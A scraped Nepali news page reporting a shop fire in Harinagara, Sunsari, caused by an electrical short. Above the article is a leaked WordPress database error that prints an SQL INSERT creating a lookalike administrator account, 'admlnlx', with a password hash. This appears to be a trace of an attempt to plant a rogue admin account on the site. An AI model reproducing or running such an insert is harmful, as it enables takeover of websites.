WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B53lT5nb2ELiO3oETsgu3anI9m.j560', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:30:45', '', 'admlnlx', 'admlnlx')
इनरुवा, मंसिर २१ –
सुनसरीको हरिनगरा गाविसमा गएराति आगलागी हुँदा रु पाँच लाख बराबरको क्षति भएको छ ।
हरिनगरा गाविस–२ सुपर मार्केटमा सञ्चालन गरेको शिवन चौरसीयाको कस्मेटिक पसलमा आगलागी हुँदा रु पाँच लाख बराबरको क्षति भएको जिल्ला प्रहरी कार्यालय, सुनसरीले जनाएको छ ।
राति करिब २ बजे अचानक बिजुली सर्ट भई आगलागी हुँदा पसलमा रहेका विभिन्न कस्मेटिक सामग्री पूर्णरुपले जलेर नष्ट भएको सुनसरीका प्रहरी उपरीक्षक पोषराज पोखरेलले जानकारी दिनुभयो ।
घटनाका विषयमा स्थानीयले प्रहरी र अग्नी नियन्त्रकलाई बोलाए पनि दुई घन्टा ढिलो आएको र आज बिहान ४ बजे मात्र आगलागी नियन्त्रणमा आएको स्थानीय सुरज साहले बताउनुभयो । आगलागीलाई इनरुवा नगरपालिकाको बारुणयन्त्र र स्थानीयले नियन्त्रणमा लिएका थिए । – रासस